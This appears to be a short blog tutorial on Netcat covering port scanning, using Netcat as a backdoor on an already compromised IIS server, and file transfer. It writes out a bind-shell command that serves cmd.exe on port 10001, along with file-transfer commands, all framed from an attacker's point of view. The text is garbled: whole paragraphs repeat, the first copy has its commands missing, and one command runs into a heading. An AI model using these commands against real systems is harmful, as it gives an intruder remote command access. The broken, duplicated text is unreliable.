NetCat – The "Swiss Army Knife"
Port scanning with Netcat
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30".
Netcat as a BackDoor
So now we have Netcat uploaded to the IIS server, we want to use it to create a
backdoor, in order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS
server (lets choose port 10001) and then we can connect to this port from our
attacking machine...using Netcat of course!
The command we want to give on the server looks like this:
Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file
called hack.txt to the IIS server, and for some reason we don't want to TFTP the file.
We can use Netcat to transfer files from one system to another.
To receive a file named hack.txt on the destination system start Netcat on the IIS
server with the following command:
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30".
Netcat as a BackDoor
So now we have Netcat uploaded to the IIS server, we want to use it to create a
backdoor, in order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS
server (lets choose port 10001) and then we can connect to this port from our
attacking machine...using Netcat of course!
The command we want to give on the server looks like this:
nc -L -p 10001 -d -e cmd.exeTransferring files using Netcat
Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file
called hack.txt to the IIS server, and for some reason we don't want to TFTP the file.
We can use Netcat to transfer files from one system to another.
To receive a file named hack.txt on the destination system start Netcat on the IIS
server with the following command:
nc –l –p 1234 >hack.txt
nc destination 1234 <hack.txt
Comments
Post a Comment